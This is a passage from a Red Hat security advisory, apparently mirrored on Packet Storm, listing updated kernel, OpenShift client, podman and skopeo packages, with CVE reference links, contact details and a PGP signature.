kernel-debug-modules-internal-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-debuginfo-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-devel-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-headers-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-ipaclones-internal-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-modules-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-modules-extra-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-modules-internal-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-rt-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-debug-modules-internal-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-kvm-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-modules-internal-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-rt-selftests-internal-4.18.0-305.95.1.rt7.170.el8_4.x86_64.rpm  
kernel-selftests-internal-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-tools-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-tools-libs-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-305.95.1.el8_4.x86_64.rpm  
openshift-clients-4.10.0-202306261054.p0.g22cf04a.assembly.stream.el8.x86_64.rpm  
openshift-clients-redistributable-4.10.0-202306261054.p0.g22cf04a.assembly.stream.el8.x86_64.rpm  
openshift-hyperkube-4.10.0-202306170106.p0.g16bcd69.assembly.stream.el8.x86_64.rpm  
perf-4.18.0-305.95.1.el8_4.x86_64.rpm  
perf-debuginfo-4.18.0-305.95.1.el8_4.x86_64.rpm  
podman-3.2.3-1.1.rhaos4.10.el8.x86_64.rpm  
podman-catatonit-3.2.3-1.1.rhaos4.10.el8.x86_64.rpm  
podman-catatonit-debuginfo-3.2.3-1.1.rhaos4.10.el8.x86_64.rpm  
podman-debuginfo-3.2.3-1.1.rhaos4.10.el8.x86_64.rpm  
podman-debugsource-3.2.3-1.1.rhaos4.10.el8.x86_64.rpm  
podman-plugins-3.2.3-1.1.rhaos4.10.el8.x86_64.rpm  
podman-plugins-debuginfo-3.2.3-1.1.rhaos4.10.el8.x86_64.rpm  
podman-remote-3.2.3-1.1.rhaos4.10.el8.x86_64.rpm  
podman-remote-debuginfo-3.2.3-1.1.rhaos4.10.el8.x86_64.rpm  
podman-tests-3.2.3-1.1.rhaos4.10.el8.x86_64.rpm  
python3-perf-4.18.0-305.95.1.el8_4.x86_64.rpm  
python3-perf-debuginfo-4.18.0-305.95.1.el8_4.x86_64.rpm  
skopeo-1.2.4-1.1.el8.x86_64.rpm  
skopeo-debuginfo-1.2.4-1.1.el8.x86_64.rpm  
skopeo-debugsource-1.2.4-1.1.el8.x86_64.rpm  
skopeo-tests-1.2.4-1.1.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkpjntAAoJENzjgjWX9erEIaUQAJdskIzUWAwkltwUZqvqgNAk  
RwMWmbwazscWXj/d5BrzMlOavQgs251wPXy4WdWN6AOqXb9SULj1tJjUUGxXnGMw  
zVp6Hyk2ClanJ59RTDaeWLhoF4cvarEI0fkSd0W0OljMehH7gkcyQ1q6VKJBOaan  
k05UQUlC0GZrMCStl1HA2ewEh/YhkKyqQuoA9jTKhOUA3YUo/sqBiHf9KUdnCD2X  
oGdb94rYeMkH+yPk2RQL64FjMCYyVQL0EQArVXJv7OJj7CBk/ltUy2evAJjbGGYn  
fa9FV8YqIc2DJTJ/EAOxkX9qfTSqqRm+gjJS9I6oBqHhjJfaO9wvd4S3LbJNHMO7  
auJqXSDMHpjtLlgOsWPQy1Va2LYkUsM71eNOwYbOQylr5ayjhOSuPCgM93GCGqqp  
AnV7W5wO3Z59GPaTWCDyAcAVm/ChYh8KcGN4K9O4A4XX6XeriyH8nVBDMtgMuUYx  
Z7ED3SJ03aw2fXm4P+KgVkbviM02M0MIqVhdqck502QXuD85ovPyzAKGJRtAKI4w  
7cLNaK1ln39xaxe1J3hruYP8uoYoLWpzJQZYtGGtTVXWTI+39gMzJB2lMF6zmzcT  
UYb9EUyivqAKnzdZinyJjs9UtTh/hqU8MQPdffhTv4meTwhH8nV11myXT+DyRpN5  
IkhGnBX5Er1jCx8seRtM  
=SpCV  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm